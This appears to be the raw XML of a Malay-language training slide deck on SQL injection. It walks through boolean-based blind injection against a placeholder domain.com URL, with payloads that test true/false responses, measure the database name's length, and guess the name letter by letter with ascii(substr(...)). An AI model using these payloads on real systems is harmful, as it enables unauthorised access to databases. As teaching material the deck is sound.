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59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d Syirazi" initials="MS" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="d87089582bbafe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3AAF-AE96-4362-B543-4E0E3335D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A4DA-A891-4B4E-8E26-17D87702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A3B1-F7FD-42BF-89CA-51153D08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0F87-A96A-4CD1-8701-0BB9805D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7737-984E-44EA-AD8B-ACAFFFCC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106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2120-9CA7-47FF-B429-D7E8B53D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DE61-8128-43A2-8ACA-534A783A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93BD-3F9A-4E17-86BE-9F0C887B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1C92-691C-4BDC-B4FF-7CC58255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EA34-742D-4E2F-AFDB-494EFBDF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31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A7479-26D1-48B1-9BCF-C62B99BE1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51B6-151B-49DD-86F9-4B1F30EEE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88E9-8E41-4720-AE22-C096D14F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650D-3855-4B2F-AE2F-C72B3FF3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F5D2-BF38-4647-BE1B-5A55DE96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48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D457-52BE-42B6-A47C-15FE66C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98CA-4E12-4A87-9674-487C26BE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3612-9BA8-4642-AA7B-EB3D1EBB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5A43-3921-42C8-AF43-91EF7F1D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ABE7-4DA7-442F-A56C-33386FDF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88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1C6-470F-440B-8511-38F790B2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32D1-8E42-4E80-B159-E15E473E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AD7A-263F-46C6-B4F8-2320BE8F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C735-0D36-4359-95FD-2669743E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41EB-9A2B-455F-B065-6C0B142D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42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78EA-6BCE-464E-A583-A4AFABE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E2C5-8476-4BF7-990B-8AC61500C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50D5C-9ABC-4182-B3A3-BBDB402CD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2460-4940-4EF8-AB2C-52A4C908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32AB-FD8F-462A-BD25-4CBAABAB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A63A-24FC-4CB1-A6EE-9407E432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12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DBF-FA1B-4D5E-B993-45CDD970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D6C5-5D67-4C4C-9CFE-75C947CA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CABFA-15BB-42E7-B211-74F5C6D8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34B73-B878-4BA0-B251-14EC8DF13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D7366-3F8F-4FB8-BC09-488D8E569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B8366-AAF1-4041-818A-320F294E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80246-EC18-40F6-8013-B9A0C5D8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20869-AD59-4BB8-8979-DFCAB96D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0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FC88-0EEA-4214-9ABD-656684B4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376AC-EDCA-4EB4-9111-40201EE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92FD8-238A-4484-B5FC-4DB38D5C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1B5A-F6D8-4918-931C-A573DDDE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096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91A28-F910-4EC1-A8FA-E6E6CBC5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7E4F3-D1F1-46EA-AF3E-5CEE3FB0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F4286-670C-4972-8278-B933839F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782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F797-8246-4C1C-9856-3050297E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AA08-CDF5-4AEF-B56E-FF3F1B17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83ED-4971-4DDE-ACCE-13090756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2EE8-D7AD-4CF6-AA91-0696697F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6D04-7692-4732-AC86-9C0B4B48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363C0-945D-471B-8B98-2739039E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06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2D4B-50D3-4DF1-AF95-87CA3987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CEF6-E297-447C-9725-A817E15AD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E74C-59ED-4B4C-96F4-1CCFEDD8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43BB-8856-443A-8D9F-DD48B3DD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52EB-F89B-4413-98B3-949EB9E5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6A174-CF16-4AB1-9733-EB1F09D7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82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F36EE-5BB3-4256-BF26-02F50B82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CA69-F017-48AF-BAD3-0F7E840C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244C-EE64-4809-A65D-88B773360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FB8F-7D8C-4B96-A747-FC740BD777D4}" type="datetimeFigureOut">
              <a:rPr lang="en-MY" smtClean="0"/>
              <a:t>26/1/2022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065A-1284-4348-A6C7-47E5F6948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CC1-FBE8-4C54-9726-A69097137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6A87-C8F1-4FDF-A228-F3110BBFF8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93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/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://domain.com/php?id=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burp/documentation/collaborator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articles.in/beginner-guide-sql-injection-boolean-based-part-2/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a563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swigger.net/web-security/sql-injection/blin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1F69-89F4-44F2-8BD9-D646A53E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44" y="739502"/>
            <a:ext cx="9053384" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-MY" sz="5200" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-MY" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-MY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0387-6DE3-42E3-BD19-B68FF668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036" y="2176534"/>
            <a:ext cx="9144000" cy="34468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SQL Injection ?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SQL Injection.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Penerangan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cara-cara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vulnerability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Eksploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pelbagai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SQL vulnerability.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Konklusi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cara-cara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berlakunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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92E259-4F4C-4BF8-9453-03EFFAA06051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207036" y="1767350"/>
            <a:ext cx="8419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B62670-E752-4377-B8C8-FAE6C5EF287D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10668000" y="6388443"/>
            <a:ext cx="139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7216D8-218C-4E57-812D-B85ABFE75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710" y="188295"/>
            <a:ext cx="1862391" cy="18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5425-A777-412B-A67F-90FB8AF8D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35" y="144652"/>
            <a:ext cx="7220755" cy="560701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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Checking Vuln </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2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317BA-3EAB-4EDF-8A2F-93BEC57E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035" y="1039970"/>
            <a:ext cx="10972800" cy="49422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900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Cara yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>pertama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adalah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dengan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letakkan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tanda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ketik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selepas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nombor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> 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900" dirty="0">
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://domain.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ke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dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>untuk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dapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> answer TRUE :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>main.com/php?id=1' AND 1=1 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>SELECT * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> WHERE id=1' AND 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ke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dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> answer FALSE :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND 1=0 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>SELECT * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> WHERE id=1' AND 1=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="19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438CD-24CE-4E15-BA22-3609A39F79D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528035" y="875763"/>
            <a:ext cx="1097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0C5C7D-25E1-4605-9E2A-1921FBCA8AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10730249" y="6384699"/>
            <a:ext cx="1541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62236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2058-3CB2-4A3E-9698-F40697FB6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53" y="309092"/>
            <a:ext cx="9144000" cy="496305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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Checking for Panjang Database(Database String)</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2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F7B2-F9A2-4950-9E97-2DD6905D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912" y="1423121"/>
            <a:ext cx="11110175" cy="5112910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,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akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> check Panjang database. Masukkan payload dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> return true, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>maksudnya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itulah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> Panjang database yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. Kita </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>perlu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tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> Panjang Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ini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supaya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boleh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tahu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ianya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terdiri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daripada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berapa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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Payload :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (length(database())) = 1 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (length(database())) = 2 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (length(database())) = 3 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-MY" sz="19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EF0180-A332-4F4C-A0A0-193B93C0D1DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455053" y="901521"/>
            <a:ext cx="11110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966019-0B47-4B0D-B625-017EAAFE9EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10779618" y="6351365"/>
            <a:ext cx="1412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59443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C50F-DB15-4CAC-87D4-E858CE045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507" y="180303"/>
            <a:ext cx="9144000" cy="444791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Guessing Database name</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2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3B5D3-9CB9-487C-9EEA-7FB93B42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507" y="1056069"/>
            <a:ext cx="11187448" cy="52674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00" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Selepas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dah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> Panjang Database, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>sekarang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kena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> guess Database name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dengan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menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> ASCII code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Payload di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>bawah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ini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digunakan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untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> check First letter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> Database, Jika TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>maksudnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>huruf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pertama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dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>itu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adalah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atas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daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> 100:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-MY" sz="1900" i="1" u="sng" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>((select database()),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="0" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,1))) &gt; 100 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,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try n error dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> code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pertama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115 kerana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ianya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> return TRUE, payload yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>digunakan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seperti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berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>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900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>((select database()),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,1))) = 115 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>*115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 s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>jika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dirujuk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kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>‘https://www.ascii-code.com/’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Kemudian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boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> test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cari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kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> pula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dengan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cara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tukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>seperti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berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>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900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>((select database()),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,1))) = 115 --+</a:t>
            </a:r>
          </a:p>
